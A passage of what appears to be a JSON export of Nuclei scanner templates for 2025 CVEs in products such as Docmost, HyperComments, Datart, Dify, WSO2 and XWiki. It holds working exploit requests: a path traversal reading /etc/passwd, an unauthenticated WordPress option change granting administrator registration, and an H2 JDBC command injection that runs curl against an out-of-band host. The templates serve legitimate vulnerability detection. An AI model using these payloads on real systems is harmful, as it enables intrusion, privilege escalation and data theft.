\"application/vnd.citrix.authenticateresponse\")'\n          - '!contains(body, \"<InitialValue></InitialValue>\")'\n          - '!contains(to_string(iv), \"false\")'\n          - '!contains(to_string(iv), \"true\")'\n          - '!regex(\"^[A-Za-z0-9+/=\\\\s]+$\", iv)'\n        condition: and\n# digest: 4b0a00483046022100c4e23d03bc587c56228e8087ab561b290df5d0e5afd5a018eb25a4d123709a0e022100be7877c8e8a426d81e6e3b9c9ec3d8739af115f15cb1125f33ac4df9549c23fc:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-5777.yaml","vuln_id":"cve-2025-5777"},{"raw":"id: CVE-2025-57231\n\ninfo:\n  name: Docmost 0.2.1-0.21.0 - Arbitrary File Read\n  author: anirbala98\n  severity: high\n  description: |\n    Docmost v0.21.0 contains a path traversal caused by improper handling of avatar attachments, letting unauthenticated attackers disclose local files via a POST request on a public URL.\n  impact: |\n    Unauthenticated attackers can disclose local files, potentially exposing sensitive information.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal\n    - https://github.com/advisories/GHSA-59m3-fj8c-996g\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-57231\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-57231\n    epss-score: 0.0126\n    epss-percentile: 0.683\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: docmost\n    product: docmost\n    shodan-query: http.title:\"Docmost\"\n    fofa-query: title=\"Docmost\"\n  tags: cve,cve2025,docmost,lfi,traversal,file-read,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /api/attachments/img/avatar/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100ffe6be7b681c66bb77a76b6d011e8c122a71c6c2b4a158809c532b210f5aafc8022100fdc47d0141cf5da0a41aee3a057cc9629d26db03154c1a9913ce2ccabde36340:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-57231.yaml","vuln_id":"cve-2025-57231"},{"raw":"id: CVE-2025-5701\n\ninfo:\n  name: HyperComments <= 1.2.2 - Arbitrary Options Update\n  author: kylew1004\n  severity: critical\n  description: |\n    The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.\n  impact: |\n    Unauthenticated attackers can update arbitrary WordPress options including default user roles, enabling privilege escalation to administrator access through self-registration.\n  remediation: |\n    Upgrade HyperComments plugin to a version later than 1.2.2 that implements proper capability checks on the hc_request_handler function.\n  reference:\n    - https://github.com/Nxploited/CVE-2025-5701/blob/main/CVE-2025-5701.py\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-5701\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-5701\n    epss-score: 0.02063\n    epss-percentile: 0.80519\n    cwe-id: CWE-862\n  metadata:\n    verified: false\n    max-request: 2\n    vendor: wordpress\n    product: hypercomments\n    fofa-query: body=\"/wp-content/plugins/hypercomments\"\n  tags: cve,cve2025,wp,wp-plugin,wordpress,hypercomments,priv-esc,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/hypercomments/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - compare_versions(detected_version, \"<= 1.2.2\")\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: detected_version\n        group: 1\n        regex:\n          - '(?i)Stable.tag:\\s?([\\w.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/index.php?hc_action=update_options HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {\"default_role\":\"administrator\",\"users_can_register\":\"1\"}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - '(?i)\\{\\s*\"result\"\\s*:\\s*\"success\"\\s*\\}'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"version: \" + detected_version'\n# digest: 490a004630440220366207d163237624a4e3a404e53d3952c808e6b912b622898c6becede11a91bf022002842bf6c03b9230c149d6ed11015a9bf40e1c1b27c1e22cd2cb43949e07e043:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-5701.yaml","vuln_id":"cve-2025-5701"},{"raw":"id: CVE-2025-56819\n\ninfo:\n  name: Datart v1.0.0-rc.3 - Remote Code Execution\n  author: Redmomn\n  severity: critical\n  description: |\n    Datart v1.0.0-rc.3 contains a vulnerability that allows remote attackers to execute arbitrary code via INIT connection parameters.\n  impact: |\n    Remote attackers can execute arbitrary code, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://github.com/advisories/GHSA-623q-jr4p-f87c\n    - https://github.com/xyyzxc/CVE-2025-56819\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-56819\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-56819\n    epss-score: 0.03196\n    epss-percentile: 0.87558\n    cwe-id: CWE-78\n    cpe: cpe:2.3:a:running-elephant:datart:1.0.0:rc3:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: datart\n    product: datart\n    fofa-query: 'title=\"Datart\"'\n    shodan-query: 'title:\"Datart\"'\n    hunter-query: 'web.title=\"Datart\"'\n  tags: cve,cve2025,datart,rce,h2,jdbc,oast,authentication,vuln\n\nvariables:\n  rand_alias: '{{rand_text_alpha(8)}}'\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/users/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"email\\\":\", \"data\\\":{\")'\n          - 'status_code == 200'\n        internal: true\n\n    extractors:\n      - type: kval\n        name: token\n        part: header\n        kval:\n          - authorization\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/data-provider/test HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: {{token}}\n\n        {\n          \"name\": \"jdbc-data-provider\",\n          \"type\": \"JDBC\",\n          \"properties\": {\n            \"dbType\": \"H2\",\n            \"url\": \"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS {{rand_alias}} AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\\\;}'\\\\;CALL {{rand_alias}} ('curl {{interactsh-url}}')\\\\;\",\n            \"user\": null,\n            \"password\": \"\",\n            \"driverClass\": \"org.h2.Driver\",\n            \"serverAggregate\": false,\n            \"enableSpecialSQL\": false,\n            \"enableSyncSchemas\": true,\n            \"syncInterval\": \"60\",\n            \"properties\": {}\n          }\n        }\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - 'dns'\n\n    extractors:\n      - type: json\n        part: body\n        name: message\n        json:\n          - '.message'\n        internal: true\n# digest: 4a0a00473045022100f4457cd8421adcadfdeb3dfc345eec22d51f29053cfe49efea519e24ef59c39202207b90bd20a25af7dcd866f857984b78b8eb849236df759fb4eb9da201172d5f62:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-56819.yaml","vuln_id":"cve-2025-56819"},{"raw":"id: CVE-2025-56520\n\ninfo:\n  name: Dify v1.6.0 - Server-Side Request Forgery\n  author: 0x_Akoko\n  severity: high\n  description: |\n    Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.\n  impact: |\n    Attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://github.com/langgenius/dify\n    - https://dify.ai/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\n    cvss-score: 9.3\n    cve-id: CVE-2025-56520\n    epss-score: 0.00696\n    epss-percentile: 0.51576\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.title:\"Dify\"\n    fofa-query: title=\"Dify\"\n  tags: cve,cve2025,dify,ssrf,oast,oob,oss,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"file_type\"\n          - \"file_length\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n          - \"dns\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022074f706dcbd27e5b66c45a71dd48c851bbc937fcdfe2d9f1e432196f86750c1220220337b410082af9b0d87ea99df7f92ae5454a84420a3ae91a6f4f4a93b8c6f73c9:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-56520.yaml","vuln_id":"cve-2025-56520"},{"raw":"id: CVE-2025-56266\n\ninfo:\n  name: Avigilon ACM - Host Header Injection\n  author: DhiyaneshDK\n  severity: medium\n  description: |\n    A Host Header Injection vulnerability in Avigilon ACM v7.10.0.20 allows attackers to execute arbitrary code via supplying a crafted URL.\n  impact: |\n    Attackers can execute arbitrary code remotely by supplying crafted URLs, potentially compromising the system.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-56266\n    - https://github.com/nikolas-ch/CVEs/tree/main/AvigilonACM_v7.10.0.20/HostHeaderInjection\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2025,vuln,avigilon\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"Avigilon\", \"Access Control Manager\")'\n        internal: true\n\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{randstr}}.tld\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: location\n        words:\n          - '{{randstr}}.tld'\n\n      - type: status\n        status:\n          - 302\n# digest: 4b0a00483046022100ab9086a31079817a857dd57dc3bfc748d99d40262d93e75e1210c7a3903a5b3d022100bfa7d91ff26979bd714b0462a73c0c48c9e985d12bdb2a0b52b58adfa9c94991:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-56266.yaml","vuln_id":"cve-2025-56266"},{"raw":"id: CVE-2025-56132\n\ninfo:\n  name: LiquidFiles < 4.2 - User Enumeration via Password Reset\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    LiquidFiles filetransfer server before 4.2 contains a user enumeration vulnerability caused by distinguishable responses in password reset functionality, letting unauthenticated attackers enumerate valid user accounts, exploit requires no authentication.\n  impact: |\n    Attackers can enumerate valid user emails, increasing risk of targeted password attacks and account compromise.\n  remediation: |\n    Update to version 4.2 or later which introduces user-based lockout mechanisms.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-56132\n    - https://docs.liquidfiles.com/release_notes/version_4-2-x.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cve-id: CVE-2025-56132\n    cwe-id: CWE-305\n    epss-score: 0.00695\n    epss-percentile: 0.51557\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: liquidfiles\n    product: liquidfiles\n    shodan-query: http.title:\"LiquidFiles\"\n    fofa-query: title=\"LiquidFiles\"\n  tags: cve,cve2025,liquidfiles,user-enum,vkev,vuln\n\nflow: http(1) && http(2)\n\nvariables:\n  email: \"nonexistent-user-enumtest-{{rand_int(10000,99999)}}@test.invalid\"\n\nhttp:\n  - raw:\n      - |\n        POST /password_reset HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        user[email]={{email}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(set_cookie, '_filetransfer_session')\"\n          - \"status_code == 302\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(body, 'invalid_email','LiquidFiles')\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 4a0a00473045022100b0b302cdf9155f26d89bdf88e4c1f0b0a91794874159905b84180a3a687ab11102201e8d83ddac545aaf78baa9bb0a5c848713c6f9fbcd48026daed36a7abfa25022:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-56132.yaml","vuln_id":"cve-2025-56132"},{"raw":"id: CVE-2025-5605\n\ninfo:\n  name: WSO2 Management Console - Authentication Bypass\n  author: DhiyaneshDK\n  severity: medium\n  description: |\n    An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.\n  remediation: |\n    Apply security patches as per WSO2-2025-4115 advisory to enforce proper authentication on Management Console endpoints.\n  impact: |\n    Attackers can bypass authentication to access internal memory statistics, leading to partial information disclosure.\n  reference:\n    - https://blog.lexfo.fr/wso2.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-5605\n    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4115/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:1398055326\n  tags: cve,cve2025,wso2,auth-bypass,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /carbon/server-admin/memory_info.jsp;.jar HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - 'Memory Statistics'\n          - 'Collection Usage'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207dc68a15c2b785260e3ef1f8803cbdcad10fe200787832c034ada9e1158f602d022008d49961011e276baf6081202ea168e8668950ae733a28f4d2514a44033b678d:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-5605.yaml","vuln_id":"cve-2025-5605"},{"raw":"id: CVE-2025-55749\n\ninfo:\n  name: XWiki - Information Disclosure\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    XWiki 16.7.0 to 16.10.11, 17.4.4, and 17.7.0 using XJetty contains an information disclosure vulnerability caused by exposed context allowing static access to files in webapp/ folder, letting attackers access sensitive files, exploit requires use of XJetty package.\n  impact: |\n    Attackers can access sensitive files including credentials, leading to information disclosure.\n  remediation: |\n    Update to versions 16.10.11, 17.4.4, or 17.7.0 or later.\n  reference:\n    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-53gx-j3p6-2rw9\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-55749\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-55749\n    epss-score: 0.01471\n    epss-percentile: 0.7264\n    cwe-id: CWE-284\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: app=\"XWIKI-Platform\"\n  tags: cve,cve2025,xwiki,exposure,vuln,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/webapps/xwiki/WEB-INF/xwiki.properties\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: response\n        words:\n          - \"diff.xml.dataURI\"\n          - \"core.renderingcache.enabled\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100a1a8ce665dd8354ffb8099ef017d8facb44b7570acb78cdf9fb4189a468e12f1022100f924a1ba582fac55a61636695c6b9c710c5cb591817242b168ad4dde581299e3:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-55749.yaml","vuln_id":"cve-2025-55749"}]}